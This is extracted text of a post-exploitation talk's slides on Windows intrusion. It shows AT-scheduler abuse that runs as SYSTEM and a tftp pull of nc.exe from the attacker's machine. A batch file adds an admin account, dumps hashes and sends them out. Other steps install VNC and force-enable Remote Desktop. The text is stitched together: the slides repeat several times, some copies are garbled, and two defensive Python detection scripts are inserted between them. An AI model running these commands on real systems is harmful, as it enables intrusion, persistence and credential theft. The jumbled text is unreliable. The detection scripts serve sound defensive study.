Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
– Support all post-exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature modification is basically securable object manipulation
– Remember all those tokens and security descriptors?
– These can be modified programmatically and directly
• Not just through existing tools
– Stealth / persistence requirements
• May make it more advantageous to use custom tools
– Access objects programmatically
– Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
– PsExec: it's still cool (thanks Mark)
• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
– Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
– Psexec was a great, awesome remote shell/command tool
– Everybody now disables clipbook, which psexec requires. l4m3
– Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool sc.exe
– net use \\target\ipc$ /u:username userpassword
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
– Go get VNC (check out guh.nu)
– Make a folder on the target for the VNC files
– Copy the following files to the target folder
• winvnc.exe
• vnc.reg
• vnchooks.dll
• omnithread_rt.dll
– regedit -s vnc.reg
– winvnc -install
– net start "vnc server"
– winvnc
– Password is "infected"
vnc.reg file contents:
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex: a system controlling access to security doors
– No command-line way of modifying the system; need a GUI
• SCADA systems
• Security cameras
• Who knows what you might be up to
– Remote Desktop is fast and already a feature of the OS
– However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
– This file will fix the policy settings that are in your way
– Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
– Then perform these commands:
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
• secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
• gpupdate /force
• net start "terminal services"
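From the defender's side, the two files above leave a recognisable fingerprint: every SeDeny*LogonRight emptied, SeRemoteInteractiveLogonRight handed to an account that is not in Remote Desktop Users, and fDenyTSConnections flipped to 0. The following audit script is an added example, not code from the talk; it parses a secedit INF and a .reg export (the sample input is the slides' own files, constructed inline) and lists those findings, taking an approved-principal list as an assumption (here the Remote Desktop Users SID, *S-1-5-32-555).

```python
"""Audit secedit INF and .reg fragments for the Remote Desktop policy-weakening pattern.
Added example for the slides above; the approved-principal list is an assumption."""

# Constructed sample input: the fix_ts_policy.ini and enable_ts.reg from the slides.
SAMPLE_INF = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

SAMPLE_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

# Deny rights whose removal (an empty assignment) widens who may log on.
DENY_RIGHTS = (
    "sedenyremoteinteractivelogonright",
    "sedenyinteractivelogonright",
    "sedenynetworklogonright",
)


def parse_sections(text):
    """Parse INI-style text (secedit INF or .reg export) into {section: {key: value}}.

    Keys are lower-cased and stripped of surrounding quotes; values keep their raw
    form (e.g. 'dword:00000000'). Header lines without '=' are ignored.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().strip('"').lower()] = value.strip().strip('"')
    return sections


def audit_privilege_rights(inf_text, approved_rdp_principals):
    """Return findings for cleared deny rights and unapproved RDP logon grants."""
    findings = []
    rights = parse_sections(inf_text).get("Privilege Rights", {})
    for right in DENY_RIGHTS:
        if right in rights and rights[right] == "":
            findings.append(f"{right} cleared: deny-logon restriction removed")
    approved = {p.lower() for p in approved_rdp_principals}
    granted = [p.strip() for p in rights.get("seremoteinteractivelogonright", "").split(",")]
    for principal in filter(None, granted):
        if principal.lower() not in approved:
            findings.append(f"seremoteinteractivelogonright grants unapproved principal {principal}")
    return findings


def audit_terminal_server_reg(reg_text):
    """Return findings for registry values that turn Terminal Services back on."""
    findings = []
    for name, values in parse_sections(reg_text).items():
        if not name.lower().endswith("control\\terminal server"):
            continue
        if values.get("fdenytsconnections") == "dword:00000000":
            findings.append("fDenyTSConnections set to 0: RDP connections enabled")
        if values.get("tsenabled") == "dword:00000001":
            findings.append("TSEnabled set to 1: Terminal Services enabled")
    return findings


def audit_rdp_enablement(inf_text, reg_text, approved_rdp_principals=("*S-1-5-32-555",)):
    """Combine both checks; the default approved principal is BUILTIN\\Remote Desktop Users."""
    return audit_privilege_rights(inf_text, approved_rdp_principals) + audit_terminal_server_reg(reg_text)


if __name__ == "__main__":
    for finding in audit_rdp_enablement(SAMPLE_INF, SAMPLE_REG):
        print(finding)
```

On a live host the same checks apply to `secedit /export /cfg` output and a `reg export` of the Terminal Server key, so the audit can be run against snapshots rather than the attacker's staging files.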
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
– The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
– Clipbook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
– Enable / start services
– Transfer files
– Adding users
– Messing with the registry, policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – flow
• Establish an authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols; TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
– net use \\target
– net time \\target
– at \\target (net time +1min) "tftp -i use GET e.bat"
– at \\target (net time +2min) e.bat
– e.bat does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hash-dumping tools and dumps hashes
• Sends hashes, identified by IP, back to the attacker host
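The commands on slides 50, 58 and 61 (re-enabling clipsrv/netdde with sc, binary-mode tftp GETs, net user /add followed by net localgroup administrators /add) are exactly what a defender should be matching in scheduled-job command lines, .job/.bat contents and command-line logging. This indicator scanner is an added example, not a tool from the talk; the rule names, the severity logic and the sample batch file (constructed, with a benign line mixed in) are assumptions.

```python
"""Scan command lines for the scheduler-abuse indicators shown on the slides.
Added example; rule names, verdict labels and sample input are constructed."""
import re

# One rule per technique on the slides, matched case-insensitively per command line.
INDICATOR_RULES = [
    # slide 50: sc \\target config clipsrv|netdde|netddedsdm start= auto
    ("service_reenable",
     re.compile(r"\bsc(\.exe)?\b.*\bconfig\s+(clipsrv|netdde|netddedsdm)\b.*\bstart=\s*auto\b", re.I)),
    # slides 58/61: tftp -i <host> GET <file>  (binary-mode pull of tooling)
    ("tftp_binary_fetch",
     re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\bGET\b", re.I)),
    # slide 61: net user <name> <pass> /add
    ("local_user_add",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    # slide 61: net localgroup administrators <name> /add
    ("admin_group_add",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
]

# Constructed sample: the e.bat described on slide 61 plus one benign admin line.
SAMPLE_BATCH = """@echo off
net user hacked hacked /add
net localgroup administrators hacked /add
tftp -i 10.0.0.5 GET pwdump.exe
net start spooler
sc \\\\fileserver config clipsrv start= auto
"""


def scan_command_line(line):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in INDICATOR_RULES if rx.search(line)]


def scan_commands(lines):
    """Return [(line_no, stripped_line, [rule names])] for every line that hits a rule."""
    hits = []
    for number, line in enumerate(lines, 1):
        matched = scan_command_line(line)
        if matched:
            hits.append((number, line.strip(), matched))
    return hits


def classify_hits(hits):
    """Collapse per-line hits into one verdict for the whole file or job list.

    'scheduler_abuse_chain' is the full slide-61 pattern: create an account,
    put it in Administrators and pull tooling over tftp in the same batch.
    """
    rules = {rule for _, _, matched in hits for rule in matched}
    if {"local_user_add", "admin_group_add", "tftp_binary_fetch"} <= rules:
        return "scheduler_abuse_chain"
    if rules:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    found = scan_commands(SAMPLE_BATCH.splitlines())
    for number, line, matched in found:
        print(f"line {number}: {', '.join(matched)} <- {line}")
    print("verdict:", classify_hits(found))
```

Feed it the command column of `at \\host` output or the contents of %SystemRoot%\Tasks\*.job alongside batch files; the SYSTEM context the slides mention means any hit deserves triage, not just the full chain.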
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
